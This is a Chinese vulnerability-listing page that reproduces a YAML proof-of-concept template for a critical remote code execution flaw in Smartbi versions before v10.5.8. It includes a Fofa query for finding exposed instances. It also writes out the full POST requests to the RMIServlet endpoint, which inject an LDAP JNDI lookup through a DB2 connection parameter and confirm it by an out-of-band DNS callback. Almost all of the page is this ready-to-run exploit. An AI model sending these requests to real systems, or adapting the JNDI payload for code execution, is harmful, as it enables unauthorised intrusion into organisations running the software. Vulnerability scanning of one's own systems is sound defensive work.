smartbi-db2-biconfigservice-rce: Smartbi DB2 RCE

日期: 2025-09-01 | 影响软件: Smartbi DB2 | POC: 已公开

漏洞描述

Fofa: app="SMARTBI"

PoC代码[已公开]

id: smartbi-db2-biconfigservice-rce

info:
  name: Smartbi DB2 RCE
  author: xpoc
  severity: critical
  verified: true
  description: |
    Fofa: app="SMARTBI"
  solutions: smartbi 小于v10.5.8(20221125)版本(之前版本打patch.2022-11-22补丁也不行)存在db2命令执行漏洞
  reference:
    - https://www.smartbi.com.cn/patchinfo
  tags: smartbi,rce
  created: 2023/06/22

set:
  oob: oob()
  oobDNS: oob.DNS
rules:
  r1:
    request:
      method: POST
      path: /smartbi/vision/RMIServlet
      body: className=BIConfigService&methodName=testConnection&params=["DB2_V9","","localhost:6688",":clientRerouteServerListJNDIName=","admin","",{"dameng6":false,"secret-key":null,"secret-key-encrypt-type":"0","token-timeout":"60","require-password":"false"}]
    expression: response.status == 200 && response.body.ibcontains(bytes("stackTrace")) && !response.body.ibcontains(bytes("CLIENT_USER_NOT_LOGIN")) && !response.body.ibcontains(bytes("会存在RCE的安全漏洞"))
  r2:
    request:
      method: POST
      path: /smartbi/vision/RMIServlet
      body: className=BIConfigService&methodName=testConnection&params=["DB2_V9","","localhost:6688","BLUDB:clientRerouteServerListJNDIName=ldap://{{oobDNS}}","admin","",{"dameng6":false,"secret-key":null,"secret-key-encrypt-type":"0","token-timeout":"60","require-password":"false"}]
    expression: oobCheck(oob, oob.ProtocolDNS, 3)
  r3:
    request:
      method: POST
      path: /vision/RMIServlet
      body: className=BIConfigService&methodName=testConnection&params=["DB2_V9","","localhost:6688",":clientRerouteServerListJNDIName=","admin","",{"dameng6":false,"secret-key":null,"secret-key-encrypt-type":"0","token-timeout":"60","require-password":"false"}]
    expression: response.status == 200 && response.body.ibcontains(bytes("stackTrace")) && !response.body.ibcontains(bytes("CLIENT_USER_NOT_LOGIN")) && !response.body.ibcontains(bytes("会存在RCE的安全漏洞"))
  r4:
    request:
      method: POST
      path: /vision/RMIServlet
      body: className=BIConfigService&methodName=testConnection&params=["DB2_V9","","localhost:6688","BLUDB:clientRerouteServerListJNDIName=ldap://{{oobDNS}}","admin","",{"dameng6":false,"secret-key":null,"secret-key-encrypt-type":"0","token-timeout":"60","require-password":"false"}]
    expression: oobCheck(oob, oob.ProtocolDNS, 3)
expression: (r1() && r2()) || (r3() && r4())
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/smartbi-db2-biconfigservice-rce.yaml

相关漏洞推荐